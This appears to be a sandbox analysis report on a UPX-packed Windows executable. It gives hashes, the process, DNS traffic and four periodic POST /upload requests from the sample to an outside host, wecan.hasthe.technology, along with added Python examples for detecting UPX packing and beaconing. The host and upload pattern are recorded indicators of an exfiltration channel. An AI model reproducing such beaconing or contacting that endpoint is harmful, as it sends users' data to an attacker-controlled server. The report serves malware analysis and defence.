
Analysis

  • max time kernel
    141s
  • max time network
    121s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64
    arch:x86
    image:win10v2004-20240426-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    09/06/2024, 07:11 UTC

General

  • Target

    155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe

  • Size

    83KB

  • MD5

    155a8c972333ccc494b0b8dec791cb20

  • SHA1

    2c939997cf63c8c82ea3c51885a98bf87edf069b

  • SHA256

    9c3cc9ed42cb14e3693c85f29b7b9a8acf08d4f98aa7352954b4534b0c5abb85

  • SHA512

    a296f6aa75df6856465cc52b3c0f5d1628ff930f6108dd06bc6c26ddaecaad019c5caaf2998c93ad805838fea15da6f3bd906a8bf9039d54e929e53c57b265db

  • SSDEEP

    1536:LJaPJpAz869DUxWB+i4OQ4NR2Kk+aSnfZaG8fcaOCzGquSE0cF+dK:LJ0TAz6Mte4A+aaZx8EnCGVud

Score
7/10
upx

Malware Config

Signatures

  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.
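
The signature above fires on the section layout and marker bytes that the stock UPX packer leaves in a PE file. The following is an added example (not tria.ge's detection code) that reproduces the same heuristic with nothing but a PE section-table parser: it reports the UPX0/UPX1/UPX2 section names, the "UPX!" magic written before the packed data, and the tell-tale first section that reserves address space for the unpacked image but occupies zero bytes on disk. That last shape is consistent with this report, where the in-memory image (0x400000-0x42A000, 168KB) is about twice the 83KB file. The two PE images in the block are constructed in code for the test; they are not the sample itself.

```python
"""Heuristic UPX-packing check for PE files (added example, not tria.ge code).

Checks three things a UPX-style packer leaves behind:
  1. section names starting with "UPX" (UPX0/UPX1/UPX2 in stock builds),
  2. the "UPX!" magic the stock packer writes just before the packed data,
  3. a first section with a large VirtualSize but SizeOfRawData == 0
     (the UPX0 layout; modified UPX builds that rename sections keep it).
"""
import struct


def pe_sections(data: bytes):
    """Return [(name, virtual_size, raw_size)] from the PE section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    num_sections, = struct.unpack_from("<H", data, coff + 2)
    size_opt, = struct.unpack_from("<H", data, coff + 16)  # SizeOfOptionalHeader
    sect_off = coff + 20 + size_opt                        # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(num_sections):
        off = sect_off + i * 40
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, _vaddr, rsize = struct.unpack_from("<III", data, off + 8)
        sections.append((name, vsize, rsize))
    return sections


def upx_verdict(data: bytes) -> dict:
    """Combine the three heuristics into one verdict dict."""
    sections = pe_sections(data)
    names = [s[0] for s in sections]
    by_name = any(n.startswith("UPX") for n in names)
    magic = b"UPX!" in data          # cheap; any file carrying the string matches
    hollow_first = bool(sections) and sections[0][2] == 0 and sections[0][1] > 0
    return {
        "sections": names,
        "upx_section_names": by_name,
        "upx_magic": magic,
        "hollow_first_section": hollow_first,
        "packed": by_name or magic,          # high confidence: stock UPX
        "suspicious": hollow_first,          # renamed sections, same layout
    }


def build_pe(section_specs, trailer: bytes = b"") -> bytes:
    """Construct a minimal PE32 image for testing (constructed data, not a
    real binary). section_specs is [(name, virtual_size, raw_size)]."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)               # e_lfanew
    num = len(section_specs)
    size_opt = 224                                        # PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14C, num, 0, 0, 0, size_opt, 0x102)
    opt = bytearray(size_opt)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    hdr_end = 0x40 + 4 + 20 + size_opt + 40 * num
    raw_ptr = (hdr_end + 0x1FF) & ~0x1FF                  # 512-byte file alignment
    sects, vaddr = b"", 0x1000
    for name, vsize, rsize in section_specs:
        sects += name.encode().ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", vsize, vaddr, rsize, raw_ptr if rsize else 0,
            0, 0, 0, 0, 0xE0000020)
        vaddr += (vsize + 0xFFF) & ~0xFFF
        raw_ptr += rsize
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sects + trailer


# Constructed samples: a UPX-style layout and a plain one.
PACKED_SAMPLE = build_pe(
    [("UPX0", 0x20000, 0), ("UPX1", 0xA000, 0x9E00), (".rsrc", 0x1000, 0x200)],
    trailer=b"\0" * 16 + b"UPX!" + b"\x0d\x17\x0d" + b"\0" * 32)
CLEAN_SAMPLE = build_pe([(".text", 0x1000, 0x1000), (".data", 0x1000, 0x200)])

if __name__ == "__main__":
    for label, blob in (("packed", PACKED_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(label, upx_verdict(blob))
```

On a real sample, feed `open(path, "rb").read()` to `upx_verdict`; treat `packed` as a strong signal and `suspicious` as a prompt to inspect the section table by hand, since a zero raw size first section is also produced by some legitimate protectors.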

Processes

  • C:\Users\Admin\AppData\Local\Temp\155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe
    "C:\Users\Admin\AppData\Local\Temp\155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe"
    1⤵
      PID:4460

    Network

    • flag-us
      DNS
      196.249.167.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      196.249.167.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      14.160.190.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      14.160.190.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      203.107.17.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      203.107.17.2.in-addr.arpa
      IN PTR
      Response
      203.107.17.2.in-addr.arpa
      IN PTR
      a2-17-107-203.deploy.static.akamaitechnologies.com
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      154.239.44.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      154.239.44.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      wecan.hasthe.technology
      155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe
      Remote address:
      8.8.8.8:53
      Request
      wecan.hasthe.technology
      IN A
      Response
      wecan.hasthe.technology
      IN A
      172.67.183.40
      wecan.hasthe.technology
      IN A
      104.21.59.199
    • flag-us
      POST
      http://wecan.hasthe.technology/upload
      155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe
      Remote address:
      172.67.183.40:80
      Request
      POST /upload HTTP/1.1
      Host: wecan.hasthe.technology
      Accept: */*
      Content-Length: 85412
      Expect: 100-continue
      Content-Type: multipart/form-data; boundary=------------------------a85238db54ddede6
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Sun, 09 Jun 2024 07:12:13 GMT
      Content-Type: text/html
      Content-Length: 167
      Connection: keep-alive
      Cache-Control: max-age=3600
      Expires: Sun, 09 Jun 2024 08:12:13 GMT
      Location: https://computernewb.com/collab-vm/
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M7LgNe8PImy2%2FjXtGfAFZGys%2FHyYZ1CDnV%2F1K12hcn4taCeaoppwF5PXJgFMmNMDYiO02rSmOo5ho7ncNW%2FW%2BzCRVgBFiMP8A6SJiYwrgp2LDbn095WlRCf%2BIUVyaTAzjm5nAyP8RFxVkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 890f4fe33a398868-LHR
    • flag-us
      DNS
      183.59.114.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      183.59.114.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      40.183.67.172.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      40.183.67.172.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      56.126.166.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      56.126.166.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      POST
      http://wecan.hasthe.technology/upload
      155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe
      Remote address:
      172.67.183.40:80
      Request
      POST /upload HTTP/1.1
      Host: wecan.hasthe.technology
      Accept: */*
      Content-Length: 85412
      Expect: 100-continue
      Content-Type: multipart/form-data; boundary=------------------------7420f119d723243b
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Sun, 09 Jun 2024 07:12:43 GMT
      Content-Type: text/html
      Content-Length: 167
      Connection: keep-alive
      Cache-Control: max-age=3600
      Expires: Sun, 09 Jun 2024 08:12:43 GMT
      Location: https://computernewb.com/collab-vm/
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gTw9OrRsbsYl77hPRvn1X%2FmUIIJllk4u3VFdqUPyx%2FemBWZvBsagbhtQT7u4GUErzhjW0U2vb5m%2FDeiBrcTbpfQUs4EfBnR41%2BSL4tvRqZxuI5sLpmTs6wLeYktc43MiYZq53IdI5uVQ1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 890f509f6b226536-LHR
    • flag-us
      DNS
      172.210.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.210.232.199.in-addr.arpa
      IN PTR
      Response
    • flag-us
      POST
      http://wecan.hasthe.technology/upload
      155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe
      Remote address:
      172.67.183.40:80
      Request
      POST /upload HTTP/1.1
      Host: wecan.hasthe.technology
      Accept: */*
      Content-Length: 85412
      Expect: 100-continue
      Content-Type: multipart/form-data; boundary=------------------------f79ec36761d959f8
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Sun, 09 Jun 2024 07:13:13 GMT
      Content-Type: text/html
      Content-Length: 167
      Connection: keep-alive
      Cache-Control: max-age=3600
      Expires: Sun, 09 Jun 2024 08:13:13 GMT
      Location: https://computernewb.com/collab-vm/
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IANVeOsTim7NXGafjUjdRqejKnvvM7W4AsaD3upuKvXVUa6XPtEFlc5OaXMJTIJMVqlCsyp5jKRegkXtx4tium%2FD73VlyPW%2Fix7VQ31B4m3n5Q%2BF9rRlPP6ouJ6SZhJsq0dRFOCFE492VQ%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 890f515baf6623c6-LHR
    • flag-us
      POST
      http://wecan.hasthe.technology/upload
      155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe
      Remote address:
      172.67.183.40:80
      Request
      POST /upload HTTP/1.1
      Host: wecan.hasthe.technology
      Accept: */*
      Content-Length: 85412
      Expect: 100-continue
      Content-Type: multipart/form-data; boundary=------------------------b24cf271c27f82ea
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Sun, 09 Jun 2024 07:13:43 GMT
      Content-Type: text/html
      Content-Length: 167
      Connection: keep-alive
      Cache-Control: max-age=3600
      Expires: Sun, 09 Jun 2024 08:13:43 GMT
      Location: https://computernewb.com/collab-vm/
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LEnA4Jca86BHrG8f78MTJD1xGUZkN%2Fwf1FLJVOi1j0cJ%2F3dVMyo3lGaHCDhUHhZtLv7Bj3NvqetP94MNgzEIN18K779HN0W23QKti%2FjR9nG4d2TsK%2BXcfS8PPuwvRyKQ6dWMfY8UEX0y9w%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 890f5217db0d067e-LHR
    • 172.67.183.40:80
      http://wecan.hasthe.technology/upload
      http
      155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe
      14.6kB
      1.4kB
      15
      13

      HTTP Request

      POST http://wecan.hasthe.technology/upload

      HTTP Response

      301
    • 172.67.183.40:80
      http://wecan.hasthe.technology/upload
      http
      155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe
      14.6kB
      1.4kB
      15
      14

      HTTP Request

      POST http://wecan.hasthe.technology/upload

      HTTP Response

      301
    • 172.67.183.40:80
      http://wecan.hasthe.technology/upload
      http
      155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe
      14.6kB
      1.5kB
      15
      16

      HTTP Request

      POST http://wecan.hasthe.technology/upload

      HTTP Response

      301
    • 172.67.183.40:80
      http://wecan.hasthe.technology/upload
      http
      155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe
      14.6kB
      1.5kB
      15
      17

      HTTP Request

      POST http://wecan.hasthe.technology/upload

      HTTP Response

      301
    • 8.8.8.8:53
      196.249.167.52.in-addr.arpa
      dns
      73 B
      147 B
      1
      1

      DNS Request

      196.249.167.52.in-addr.arpa

    • 8.8.8.8:53
      203.107.17.2.in-addr.arpa
      dns
      71 B
      135 B
      1
      1

      DNS Request

      203.107.17.2.in-addr.arpa

    • 8.8.8.8:53
      14.160.190.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      14.160.190.20.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
      144 B
      1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      154.239.44.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      154.239.44.20.in-addr.arpa

    • 8.8.8.8:53
      wecan.hasthe.technology
      dns
      155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe
      69 B
      101 B
      1
      1

      DNS Request

      wecan.hasthe.technology

      DNS Response

      172.67.183.40
      104.21.59.199

    • 8.8.8.8:53
      183.59.114.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      183.59.114.20.in-addr.arpa

    • 8.8.8.8:53
      40.183.67.172.in-addr.arpa
      dns
      72 B
      134 B
      1
      1

      DNS Request

      40.183.67.172.in-addr.arpa

    • 8.8.8.8:53
      56.126.166.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      56.126.166.20.in-addr.arpa

    • 8.8.8.8:53
      172.210.232.199.in-addr.arpa
      dns
      74 B
      128 B
      1
      1

      DNS Request

      172.210.232.199.in-addr.arpa
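
Two things in the network log above are worth separating. The PTR lookups for 52.x, 20.x, 192.229.x and 199.232.x addresses carry no process attribution and are the sandbox's own resolver noise; only the A lookup for wecan.hasthe.technology and the four POST /upload requests are attributed to the sample. Those four requests arrive at a fixed 30-second cadence (07:12:13, 07:12:43, 07:13:13, 07:13:43 by the response Date headers), each declaring Content-Length: 85412 with Expect: 100-continue, and every one is answered with 301 to https://computernewb.com/collab-vm/ rather than a 2xx; with only 14.6kB sent per connection, the multipart body appears not to have been transmitted. The block below is an added example (not part of the report or the tria.ge tooling) of detection logic that turns that observation into a rule: it groups requests by method/host/path, flags groups with near-constant inter-request gaps and an unchanging body size, and records whether the endpoint only redirected off-site. The log lines are constructed from the report's values in a layout of my own choosing, not a real sensor format.

```python
"""Periodic-beacon detector over HTTP log lines (added example, not report code).

Log layout (constructed for this example, not a real sensor format):
    <ISO-8601 ts> <method> <host> <path> <content_length> <status> <location|->
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed from the four POST /upload requests in the report, plus one
# unrelated GET as background noise.
LOG_LINES = """
2024-06-09T07:12:13Z POST wecan.hasthe.technology /upload 85412 301 https://computernewb.com/collab-vm/
2024-06-09T07:12:43Z POST wecan.hasthe.technology /upload 85412 301 https://computernewb.com/collab-vm/
2024-06-09T07:13:13Z POST wecan.hasthe.technology /upload 85412 301 https://computernewb.com/collab-vm/
2024-06-09T07:13:43Z POST wecan.hasthe.technology /upload 85412 301 https://computernewb.com/collab-vm/
2024-06-09T07:12:20Z GET www.example.com /index.html 0 200 -
""".strip().splitlines()

REDIRECTS = (301, 302, 307, 308)


def parse_line(line: str) -> dict:
    """Split one log line into typed fields."""
    ts, method, host, path, clen, status, location = line.split()
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "method": method, "host": host, "path": path,
        "content_length": int(clen), "status": int(status),
        "location": None if location == "-" else location,
    }


def find_beacons(lines, min_hits: int = 3, max_jitter_s: float = 2.0):
    """Return one finding per (method, host, path) whose requests repeat at a
    near-constant interval. Jitter is the population std-dev of the gaps."""
    groups = defaultdict(list)
    for rec in map(parse_line, lines):
        groups[(rec["method"], rec["host"], rec["path"])].append(rec)

    findings = []
    for (method, host, path), recs in groups.items():
        if len(recs) < min_hits:
            continue
        recs.sort(key=lambda r: r["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(recs, recs[1:])]
        if pstdev(gaps) > max_jitter_s:
            continue                      # irregular: not a timer-driven beacon
        findings.append({
            "method": method, "host": host, "path": path,
            "count": len(recs),
            "period_s": round(mean(gaps), 1),
            "fixed_body_size": len({r["content_length"] for r in recs}) == 1,
            "statuses": sorted({r["status"] for r in recs}),
            # Every reply is a 3xx to another origin and no 2xx was seen: the
            # endpoint is turning the client away, so the upload did not land.
            "redirected_offsite": all(
                r["status"] in REDIRECTS and r["location"] and host not in r["location"]
                for r in recs),
        })
    return findings


if __name__ == "__main__":
    for f in find_beacons(LOG_LINES):
        print(f)
```

The `redirected_offsite` field matters for triage: a beacon that only ever receives redirects to an unrelated site is evidence of an intended upload channel, not of successful exfiltration, and the 85412-byte Content-Length should be compared against whatever the sample was trying to send rather than assumed delivered.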

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\rifaien2-Z1MPgG8QAR9cLHTj.exe

      Filesize

      83KB

      MD5

      7cf663433ab3bf51ff4048f2e2de08fd

      SHA1

      7c85aea035c618b2f513339a66f168cfba1c862b

      SHA256

      6918c2a289b6efe5f8ee64afedbc8394055401b1fc0955acc5c4551d67c044d0

      SHA512

      1df772e07bc36e16197f920c32b3c60485b090285e877c3c2ce11c7e4a3391bfdfd6a3d6b0a52101c662e14d4e5ec5df111932b1cd7664c8e15db01e72d696ae

    • memory/4460-0-0x0000000000400000-0x000000000042A000-memory.dmp

      Filesize

      168KB

    • memory/4460-1-0x0000000000400000-0x000000000042A000-memory.dmp

      Filesize

      168KB

    • memory/4460-7-0x0000000000400000-0x000000000042A000-memory.dmp

      Filesize

      168KB

    • memory/4460-14-0x0000000000400000-0x000000000042A000-memory.dmp

      Filesize

      168KB

    • memory/4460-21-0x0000000000400000-0x000000000042A000-memory.dmp

      Filesize

      168KB

    • memory/4460-29-0x0000000000400000-0x000000000042A000-memory.dmp

      Filesize

      168KB
